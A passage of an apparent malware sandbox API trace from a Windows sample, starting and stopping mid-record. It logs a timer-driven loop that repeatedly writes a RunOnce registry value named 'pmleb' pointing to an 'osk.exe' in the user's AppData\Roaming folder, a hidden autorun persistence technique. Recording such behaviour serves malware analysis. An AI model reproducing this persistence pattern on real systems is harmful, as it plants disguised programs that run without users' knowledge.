[0105.151] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.152] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.152] SetTimer (hWnd=0x20280, nIDEvent=0x2412, uElapse=0xa, lpTimerFunc=0x0) returned 0x2412 [0105.152] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.166] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.166] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.166] KillTimer (hWnd=0x20280, uIDEvent=0x2412) returned 1 [0105.167] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.167] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.167] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.168] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.168] RegCloseKey (hKey=0x280) returned 0x0 [0105.168] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.168] SetTimer (hWnd=0x20280, nIDEvent=0x2413, uElapse=0xa, lpTimerFunc=0x0) returned 0x2413 [0105.168] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.181] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.181] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.181] KillTimer (hWnd=0x20280, uIDEvent=0x2413) returned 1 [0105.181] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.182] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.182] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.182] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.182] RegCloseKey (hKey=0x280) returned 0x0 [0105.182] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.182] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.182] SetTimer (hWnd=0x20280, nIDEvent=0x2414, uElapse=0xa, lpTimerFunc=0x0) returned 0x2414 [0105.182] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.196] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.196] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.196] KillTimer (hWnd=0x20280, uIDEvent=0x2414) returned 1 [0105.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.197] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.197] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.198] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.198] RegCloseKey (hKey=0x280) returned 0x0 [0105.198] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.198] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.198] SetTimer (hWnd=0x20280, nIDEvent=0x2415, uElapse=0xa, lpTimerFunc=0x0) returned 0x2415 [0105.198] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.212] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.212] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.212] KillTimer (hWnd=0x20280, uIDEvent=0x2415) returned 1 [0105.213] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.213] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.213] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.213] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.214] RegCloseKey (hKey=0x280) returned 0x0 [0105.214] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.214] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.214] SetTimer (hWnd=0x20280, nIDEvent=0x2416, uElapse=0xa, lpTimerFunc=0x0) returned 0x2416 [0105.214] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.228] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.228] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.228] KillTimer (hWnd=0x20280, uIDEvent=0x2416) returned 1 [0105.228] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.229] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.229] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.229] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.229] RegCloseKey (hKey=0x280) returned 0x0 [0105.229] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.229] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.229] SetTimer (hWnd=0x20280, nIDEvent=0x2417, uElapse=0xa, lpTimerFunc=0x0) returned 0x2417 [0105.230] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.244] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.244] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.244] KillTimer (hWnd=0x20280, uIDEvent=0x2417) returned 1 [0105.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.245] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.245] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.245] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.245] RegCloseKey (hKey=0x280) returned 0x0 [0105.246] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0105.246] SetTimer (hWnd=0x20280, nIDEvent=0x2418, uElapse=0xa, lpTimerFunc=0x0) returned 0x2418 [0105.246] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.259] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.259] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.259] KillTimer (hWnd=0x20280, uIDEvent=0x2418) returned 1 [0105.259] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.260] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.260] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.260] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.260] RegCloseKey (hKey=0x280) returned 0x0 [0105.261] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.261] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.261] SetTimer (hWnd=0x20280, nIDEvent=0x2419, uElapse=0xa, lpTimerFunc=0x0) returned 0x2419 [0105.261] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.276] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.276] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.276] KillTimer (hWnd=0x20280, uIDEvent=0x2419) returned 1 [0105.276] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.277] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.277] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.277] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.277] RegCloseKey (hKey=0x280) returned 0x0 [0105.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.278] SetTimer (hWnd=0x20280, nIDEvent=0x241a, uElapse=0xa, lpTimerFunc=0x0) returned 0x241a [0105.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.290] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.290] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.290] KillTimer (hWnd=0x20280, uIDEvent=0x241a) returned 1 [0105.290] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.291] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.291] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.291] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.291] RegCloseKey (hKey=0x280) returned 0x0 [0105.291] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.292] SetTimer (hWnd=0x20280, nIDEvent=0x241b, uElapse=0xa, lpTimerFunc=0x0) returned 0x241b 
[0105.292] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.306] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.306] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.306] KillTimer (hWnd=0x20280, uIDEvent=0x241b) returned 1 [0105.306] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.307] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.307] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.307] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.307] RegCloseKey (hKey=0x280) returned 0x0 [0105.307] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.307] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.308] SetTimer (hWnd=0x20280, nIDEvent=0x241c, uElapse=0xa, lpTimerFunc=0x0) returned 0x241c [0105.308] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.321] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.321] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.321] KillTimer (hWnd=0x20280, uIDEvent=0x241c) returned 1 [0105.321] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.322] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.322] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.322] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.322] RegCloseKey (hKey=0x280) returned 0x0 [0105.323] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.323] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.323] SetTimer (hWnd=0x20280, nIDEvent=0x241d, uElapse=0xa, lpTimerFunc=0x0) returned 0x241d [0105.323] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.337] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.337] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.337] KillTimer (hWnd=0x20280, uIDEvent=0x241d) returned 1 [0105.338] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.338] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.338] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.338] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.338] RegCloseKey (hKey=0x280) returned 0x0 [0105.339] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.339] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.339] SetTimer (hWnd=0x20280, nIDEvent=0x241e, uElapse=0xa, lpTimerFunc=0x0) returned 0x241e [0105.339] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0108.289] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.289] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.289] KillTimer (hWnd=0x20280, uIDEvent=0x241e) returned 1 [0108.290] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.291] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.291] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.292] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.292] RegCloseKey (hKey=0x280) returned 0x0 [0108.292] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.292] SetTimer (hWnd=0x20280, nIDEvent=0x241f, uElapse=0xa, lpTimerFunc=0x0) returned 0x241f [0108.293] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.301] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.301] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.301] KillTimer (hWnd=0x20280, uIDEvent=0x241f) returned 1 [0108.301] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.301] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.302] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.302] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.302] RegCloseKey (hKey=0x280) returned 0x0 [0108.302] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.302] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.302] SetTimer (hWnd=0x20280, nIDEvent=0x2420, uElapse=0xa, lpTimerFunc=0x0) returned 0x2420 [0108.302] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.316] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.316] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.317] KillTimer (hWnd=0x20280, uIDEvent=0x2420) returned 1 [0108.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.317] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.318] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.318] RegCloseKey (hKey=0x280) returned 0x0 [0108.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.318] SetTimer (hWnd=0x20280, nIDEvent=0x2421, uElapse=0xa, lpTimerFunc=0x0) returned 0x2421 [0108.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.332] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.332] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.332] KillTimer (hWnd=0x20280, uIDEvent=0x2421) returned 1 [0108.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.333] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.333] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.333] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.333] RegCloseKey (hKey=0x280) returned 0x0 [0108.333] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.334] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.334] SetTimer (hWnd=0x20280, nIDEvent=0x2422, uElapse=0xa, lpTimerFunc=0x0) returned 0x2422 [0108.334] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.348] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.348] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.348] KillTimer (hWnd=0x20280, uIDEvent=0x2422) returned 1 [0108.348] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.348] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.348] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.349] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.349] RegCloseKey (hKey=0x280) returned 0x0 [0108.349] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.349] SetTimer (hWnd=0x20280, nIDEvent=0x2423, uElapse=0xa, lpTimerFunc=0x0) returned 0x2423 [0108.349] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.363] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.363] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.363] KillTimer (hWnd=0x20280, uIDEvent=0x2423) returned 1 [0108.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.364] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.364] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.364] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.364] RegCloseKey (hKey=0x280) returned 0x0 [0108.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.365] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.365] SetTimer (hWnd=0x20280, nIDEvent=0x2424, uElapse=0xa, lpTimerFunc=0x0) returned 0x2424 [0108.365] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.379] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.379] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.379] KillTimer (hWnd=0x20280, 
